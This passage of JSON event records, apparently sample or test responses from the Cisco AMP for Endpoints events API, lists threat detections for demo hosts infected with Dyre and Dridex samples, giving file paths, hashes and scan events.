Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209700347052000,"timestamp":1610705254,"timestamp_nanoseconds":882000000,"date":"2021-01-15T10:07:34+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209700347052056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256485970936000,"timestamp":1610705253,"timestamp_nanoseconds":307000000,"date":"2021-01-15T10:07:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256485970935854","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209670282281000,"timestamp":1610705247,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:07:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209670282280983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256434431328000,"timestamp":1610705241,"timestamp_nanoseconds":295000000,"date":"2021-01-15T10:07:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256434431328301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900178000400,"timestamp":1610705238,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:07:18+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"GenericKD:Dyreza-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705238,"start_date":"2021-01-15T10:07:18+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb"},"parent":{"disposition":"Malicious","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209605857772000,"timestamp":1610705232,"timestamp_nanoseconds":855000000,"date":"2021-01-15T10:07:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209605857771542","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":358000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655340","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":343000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":280000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":249000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":890000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688040","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688039","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":625000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688038","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256382891721000,"timestamp":1610705229,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:07:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256382891720741","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209575793000000,"timestamp":1610705225,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209575793000469","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364862671421000,"timestamp":1610705225,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker","clean":true,"scanned_files":9,"scanned_processes":0,"scanned_paths":2,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364858376454000,"timestamp":1610705224,"timestamp_nanoseconds":772000000,"date":"2021-01-15T10:07:04+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256331352113000,"timestamp":1610705217,"timestamp_nanoseconds":646000000,"date":"2021-01-15T10:06:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256331352113188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209511368491000,"timestamp":1610705210,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:06:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209511368491028","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364793951945000,"timestamp":1610705209,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:06:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games","clean":true,"scanned_files":30,"scanned_processes":0,"scanned_paths":14,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364789656977000,"timestamp":1610705208,"timestamp_nanoseconds":193000000,"date":"2021-01-15T10:06:48+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256279812506000,"timestamp":1610705205,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:06:45+00:00","event_type":"Threat 